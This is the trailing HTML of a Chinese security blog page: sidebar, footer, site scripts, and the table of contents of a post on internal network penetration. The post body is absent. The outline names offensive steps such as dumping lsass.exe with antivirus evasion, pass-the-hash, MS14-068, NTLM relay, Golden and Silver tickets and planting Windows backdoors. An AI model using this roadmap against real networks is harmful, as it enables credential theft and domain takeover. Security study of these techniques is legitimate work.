                <span class="site-state-item-count">39</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">18</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/RcoIl" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=rcoil@qq.com" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-fa fa-envelope-open"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        
		
		
          <div class="feed-link motion-element">
            <div id="days"></div>
			<script language="javascript">
			function show_date_time(){
				window.setTimeout("show_date_time()", 1000);
				BirthDay=new Date("09/01/2016 10:13:14");
				today=new Date();
				timeold=(today.getTime()-BirthDay.getTime());
				sectimeold=timeold/1000
				secondsold=Math.floor(sectimeold);
				msPerDay=24*60*60*1000
				e_daysold=timeold/msPerDay
				daysold=Math.floor(e_daysold);
				e_hrsold=(e_daysold-daysold)*24;
				hrsold=setzero(Math.floor(e_hrsold));
				e_minsold=(e_hrsold-hrsold)*60;
				minsold=setzero(Math.floor((e_hrsold-hrsold)*60));
				seconds=setzero(Math.floor((e_minsold-minsold)*60));
				document.getElementById('days').innerHTML="本站已运行 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分"+ seconds +" 秒";
			}
			function setzero(i){
				if (i<10)
				{i="0" + i};
				return i;
			}		
			show_date_time();
		</script>
        </div>
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://isron.cn/" title="Isron" target="_blank">Isron</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hacktech.cn/" title="Akkuman" target="_blank">Akkuman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://rootrain.me/" title="rootrain" target="_blank">rootrain</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://kerlinglovsec.lofter.com/" title="kerling" target="_blank">kerling</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.luolikong.vip/" title="Fire-ant" target="_blank">Fire-ant</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://xnianq.cn/" title="xniang" target="_blank">xniang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://thief.one/" title="nMask" target="_blank">nMask</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://cate4cafe.com/" title="cate4cafe" target="_blank">cate4cafe</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://52stu.me/" title="IversOn5" target="_blank">IversOn5</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://hone.cool/" title="Hone" target="_blank">Hone</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://sharecast.bitcron.com/" title="sharecast" target="_blank">sharecast</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://scarletf.github.io/" title="ScarletF" target="_blank">ScarletF</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.lz1y.cn/" title="Lz1y" target="_blank">Lz1y</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-前期基本信息探测"><span class="nav-text">0x00 前期基本信息探测</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、人事组织结构图"><span class="nav-text">一、人事组织结构图</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、ip分布"><span class="nav-text">二、ip分布</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-切入点（起点）"><span class="nav-text">0x01 切入点（起点）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-靶机信息收集"><span class="nav-text">0x02 靶机信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、命令行形式"><span class="nav-text">一、命令行形式</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#（一）常用命令"><span class="nav-text">（一）常用命令</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（二）不常用命令"><span class="nav-text">（二）不常用命令</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、应用与文件形式"><span class="nav-text">二、应用与文件形式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、hash和明文"><span class="nav-text">三、hash和明文</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#（一）从-sam-中提取目标系统本地用户密码-hash"><span class="nav-text">（一）从 sam 中提取目标系统本地用户密码 hash</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（二）通过-dump-lsass-exe-进程数据离线免杀抓明文的各种方式"><span class="nav-text">（二）通过 dump lsass.exe 进程数据离线免杀抓明文的各种方式</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、procdump-exe"><span class="nav-text">1、procdump.exe</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、PowerShell"><span class="nav-text">2、PowerShell</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、SqlDumper"><span class="nav-text">3、SqlDumper</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（三）关于-windows-10-2012r2-以后系统的明文密码抓取方式"><span class="nav-text">（三）关于 windows 10 / 2012r2 以后系统的明文密码抓取方式</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-网络环境的判断"><span class="nav-text">0x03 网络环境的判断</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、位置的判断"><span class="nav-text">一、位置的判断</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、角色的判断"><span class="nav-text">二、角色的判断</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、连通性的判断"><span class="nav-text">三、连通性的判断</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x04-横向渗透"><span class="nav-text">0x04 横向渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、默认权限配置认知"><span class="nav-text">一、默认权限配置认知</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、代理转发"><span class="nav-text">二、代理转发</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、工作组横向"><span class="nav-text">三、工作组横向</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四、域环境横向（单域）"><span class="nav-text">四、域环境横向（单域）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#（一）域内信息探测"><span class="nav-text">（一）域内信息探测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（二）域管权限获取"><span class="nav-text">（二）域管权限获取</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、组策略漏洞（GPP）"><span class="nav-text">1、组策略漏洞（GPP）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、KERBEROS协议漏洞"><span class="nav-text">2、KERBEROS协议漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#（1）ms14-068"><span class="nav-text">（1）ms14-068</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、相同密码登陆（hash碰撞）"><span class="nav-text">3、相同密码登陆（hash碰撞）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4、利用漏洞配置不当获取更多主机权限"><span class="nav-text">4、利用漏洞配置不当获取更多主机权限</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5、远程命令执行方式"><span class="nav-text">5、远程命令执行方式</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6、Exchange"><span class="nav-text">6、Exchange</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7、滥用基于资源约束委派"><span class="nav-text">7、滥用基于资源约束委派</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8、NTLM中继"><span class="nav-text">8、NTLM中继</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（三）目标定位"><span class="nav-text">（三）目标定位</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、域之间、域森林"><span class="nav-text">五、域之间、域森林</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#六、权限维持"><span class="nav-text">六、权限维持</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#（一）Pass-The-Ticket"><span class="nav-text">（一）Pass The Ticket</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、Export-the-ticket"><span class="nav-text">1、Export the ticket</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2、Golden-Ticket（黄金票据）"><span class="nav-text">2、Golden Ticket（黄金票据）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#（1）导出krbtgt的Hash"><span class="nav-text">（1）导出krbtgt的Hash</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#（2）生成Golden-Ticket"><span class="nav-text">（2）生成Golden Ticket</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#（3）导入Golden-Ticket"><span class="nav-text">（3）导入Golden Ticket</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3、Silver-Ticket（白银票据）"><span class="nav-text">3、Silver Ticket（白银票据）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#（1）所需条件"><span class="nav-text">（1）所需条件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#（2）使用方法"><span class="nav-text">（2）使用方法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（二）三好学生师傅的文章"><span class="nav-text">（二）三好学生师傅的文章</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（三）域内配置ACL后门及检测清理"><span class="nav-text">（三）域内配置ACL后门及检测清理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#（四）windows后门种植方式收集"><span class="nav-text">（四）windows后门种植方式收集</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x05-整合参考"><span class="nav-text">0x05 整合参考</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
